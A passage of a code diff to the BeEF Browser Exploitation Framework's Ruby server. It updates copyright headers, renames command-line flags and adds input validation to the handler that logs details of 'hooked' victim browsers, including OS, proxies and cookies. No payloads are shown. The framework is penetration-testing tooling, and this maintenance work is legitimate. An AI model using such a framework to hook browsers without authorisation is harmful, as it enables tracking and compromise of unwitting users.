               print_info "Starting WebSocketSecure server on wss://[#{config.beef_host}:#{config.get('beef.http.websocket.secure_port').to_i} [timer: #{ws_poll_timeout}]"
             end
           end
+
+          # Print WebSocket servers
+          #
+          def print_http_proxy
+            config = BeEF::Core::Configuration.instance
+            print_info "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+          end
+
+          def print_dns
+            address = nil
+            port = nil
+            protocol = nil
+
+            # TODO: fix the following reference - extensions/dns/api.rb
+            # servers, interfaces, address, port, protocol, upstream_servers = get_dns_config # get the DNS configuration
+
+            # Print the DNS server information
+            unless address.nil? || port.nil? || protocol.nil?
+              print_info "DNS Server: #{address}:#{port} (#{protocol})"
+              print_more upstream_servers unless upstream_servers.empty?
+            end
+          end
+
         end
       end
     end

core/main/console/commandline.rb

@@ -1,8 +1,10 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+require 'optparse'
+
 module BeEF
   module Core
     module Console
@@ -17,7 +19,6 @@ module BeEF
         @options[:ext_config] = ''
         @options[:port] = ''
         @options[:ws_port] = ''
-        @options[:interactive] = false
         @options[:update_disabled] = false
         @options[:update_auto] = false
 
@@ -39,7 +40,7 @@ module BeEF
               @options[:verbose] = true
             end
 
-            opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
+            opts.on('-a', '--ascii-art', 'Prints BeEF ascii art') do
               @options[:ascii_art] = true
             end
 
@@ -55,17 +56,19 @@ module BeEF
               @options[:ws_port] = ws_port
             end
 
-            opts.on('-ud', '--update_disabled', 'Skips update') do
+            opts.on('-d', '--update-disabled', 'Skips update') do
               @options[:update_disabled] = true
             end
 
-            opts.on('-ua', '--update_auto', 'Automatic update with no prompt') do
+            opts.on('-u', '--update-auto', 'Automatic update with no prompt') do
               @options[:update_auto] = true
             end
 
-            # opts.on('-i', '--interactive', 'Starts with the Console Shell activated') do
-            #  @options[:interactive] = true
-            # end
+            opts.on('-h', '--help', 'Show this help') do
+              puts opts
+              exit 0
+            end
+
           end
 
           optparse.parse!

core/main/constants/browsers.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/constants/commandmodule.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/constants/hardware.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/constants/os.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/crypto.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 require 'securerandom'

core/main/geoip.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -18,7 +18,7 @@ module BeEF
         geoip_file = @config.get('beef.geoip.database')
 
         unless File.exist? geoip_file
-          print_error "[GeoIP] Could not find MaxMind GeoIP database: '#{geoip_file}'"
+          BeEF::Core::Logger.instance.register('System', "[GeoIP] Could not find MaxMind GeoIP database: '#{geoip_file}'")
           @enabled = false
           return
         end

core/main/handlers/browserdetails.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -44,7 +44,7 @@ module BeEF
 
           # hooked window host name
           log_zombie_port = 0
-          if !@data['results']['browser.window.hostname'].nil?
+          if !@data['results']['browser.window.hostname'].nil? && BeEF::Filters.is_valid_hostname?(@data['results']['browser.window.hostname'])
             log_zombie_domain = @data['results']['browser.window.hostname']
           elsif !@data['request'].referer.nil? and !@data['request'].referer.empty?
             referer = @data['request'].referer
@@ -59,7 +59,7 @@ module BeEF
           end
 
           # hooked window host port
-          if @data['results']['browser.window.hostport'].nil?
+          if @data['results']['browser.window.hostport'].nil? || !BeEF::Filters.is_valid_port?(@data['results']['browser.window.hostport'].to_s)
             log_zombie_domain_parts = log_zombie_domain.split(':')
             log_zombie_port = log_zombie_domain_parts[1].to_i if log_zombie_domain_parts.length > 1
           else
@@ -92,6 +92,7 @@ module BeEF
             BD.set(session_id, 'browser.name.friendly', browser_friendly_name)
           else
             err_msg "Invalid browser name returned from the hook browser's initial connection."
+            browser_name = 'Unknown'
           end
 
           if BeEF::Filters.is_valid_ip?(zombie.ip)
@@ -242,11 +243,17 @@ module BeEF
             X_FORWARDED
             X_FORWARDED_FOR
           ].each do |header|
-            proxy_clients << (JSON.parse(zombie.httpheaders)[header]).to_s unless JSON.parse(zombie.httpheaders)[header].nil?
+            val = JSON.parse(zombie.httpheaders)[header]
+            unless val.nil?
+              val.to_s.split(',').each do |ip|
+                proxy_clients << ip.strip if BeEF::Filters.is_valid_ip?(ip.strip)
+              end
+            end
           end
 
           # retrieve proxy server
           proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+          proxy_server = nil unless proxy_server.nil? || BeEF::Filters.has_valid_browser_details_chars?(proxy_server)
 
           # store and log proxy details
           if using_proxy == true
@@ -273,6 +280,7 @@ module BeEF
             BD.set(session_id, 'browser.version', browser_version)
           else
             err_msg "Invalid browser version returned from the hook browser's initial connection."
+            browser_version = 'Unknown'
           end
 
           # get and store browser string
@@ -293,7 +301,11 @@ module BeEF
 
           # get and store browser language
           browser_lang = get_param(@data['results'], 'browser.language')
-          BD.set(session_id, 'browser.language', browser_lang)
+          if BeEF::Filters.has_valid_browser_details_chars?(browser_lang)
+            BD.set(session_id, 'browser.language', browser_lang)
+          else
+            err_msg "Invalid browser language returned from the hook browser's initial connection."
+          end
 
           # get and store the cookies
           cookies = get_param(@data['results'], 'browser.window.cookies')
@@ -309,6 +321,7 @@ module BeEF
             BD.set(session_id, 'host.os.name', os_name)
           else
             err_msg "Invalid operating system name returned from the hook browser's initial connection."
+            os_name = 'Unknown'
           end
 
           # get and store the OS family
@@ -322,15 +335,28 @@ module BeEF
           # get and store the OS version
           # - without checks as it can be very different, for instance on linux/bsd)
           os_version = get_param(@data['results'], 'host.os.version')
-          BD.set(session_id, 'host.os.version', os_version)
+          if BeEF::Filters.has_valid_browser_details_chars?(os_version)
+            BD.set(session_id, 'host.os.version', os_version)
+          else
+            err_msg "Invalid operating system version returned from the hook browser's initial connection."
+            os_version = 'Unknown'
+          end
 
-          # get and store the OS arch - without checks
+          # get and store the OS arch
           os_arch = get_param(@data['results'], 'host.os.arch')
-          BD.set(session_id, 'host.os.arch', os_arch)
+          if BeEF::Filters.has_valid_browser_details_chars?(os_arch)
+            BD.set(session_id, 'host.os.arch', os_arch)
+          else
+            err_msg "Invalid operating system architecture returned from the hook browser's initial connection."
+          end
 
           # get and store default browser
           default_browser = get_param(@data['results'], 'host.software.defaultbrowser')
-          BD.set(session_id, 'host.software.defaultbrowser', default_browser)
+          if BeEF::Filters.has_valid_browser_details_chars?(default_browser)
+            BD.set(session_id, 'host.software.defaultbrowser', default_browser)
+          else
+            err_msg "Invalid default browser returned from the hook browser's initial connection."
+          end
 
           # get and store the hardware type
           hw_type = get_param(@data['results'], 'hardware.type')
@@ -400,6 +426,8 @@ module BeEF
           browser_plugins = get_param(@data['results'], 'browser.plugins')
           if BeEF::Filters.is_valid_browser_plugins?(browser_plugins)
             BD.set(session_id, 'browser.plugins', browser_plugins)
+          elsif browser_plugins == "[]"
+            err_msg "No browser plugins detected."
           else
             err_msg "Invalid browser plugins returned from the hook browser's initial connection."
           end
@@ -547,7 +575,7 @@ module BeEF
           end
 
           # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, browser:#{browser_name}-#{browser_version}, os:#{os_name}-#{os_version}], hooked domain [#{log_zombie_domain}:#{log_zombie_port}]"
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, browser:#{browser_name}-#{browser_version}, os:#{os_name}-#{os_version}], hooked origin [#{log_zombie_domain}:#{log_zombie_port}]"
 
           # add localhost as network host
           if config.get('beef.extension.network.enable')

core/main/handlers/commands.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/handlers/hookedbrowsers.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -71,7 +71,12 @@ module BeEF
 
           # @note get zombie if already hooked the framework
           hook_session_name = config.get('beef.http.hook_session_name')
-          hook_session_id = request[hook_session_name]
+          hook_session_id =
+            if request.respond_to?(:[])
+              request[hook_session_name]
+            else
+              request.params[hook_session_name] || request.env[hook_session_name]
+            end
           begin
             raise ActiveRecord::RecordNotFound if hook_session_id.nil?
 

core/main/handlers/modules/beefjs.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -19,7 +19,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js]
+            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js lib/bowser-2.11.0.min.js]
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js

core/main/handlers/modules/command.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -72,8 +72,8 @@ module BeEF
             if config.get('beef.http.websocket.enable') && ws.getsocket(hooked_browser.session)
               # content = command_module.output.gsub('//
               # //
-              # //   Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-              # //   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              # //   Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+              # //   Browser Exploitation Framework (BeEF) - https://beefproject.com
               # //   See the file 'doc/COPYING' for copying permission
               # //
               # //', "")

core/main/handlers/modules/legacybeefjs.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -19,7 +19,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js]
+            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js lib/bowser-2.11.0.min.js]
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js

core/main/handlers/modules/multistagebeefjs.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -19,7 +19,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js]
+            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js lib/bowser-2.11.0.min.js]
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js

core/main/logger.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/migration.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/model.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/models/browserdetails.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/command.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/models/commandmodule.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/execution.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/models/hookedbrowser.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/legacybrowseruseragents.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/log.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF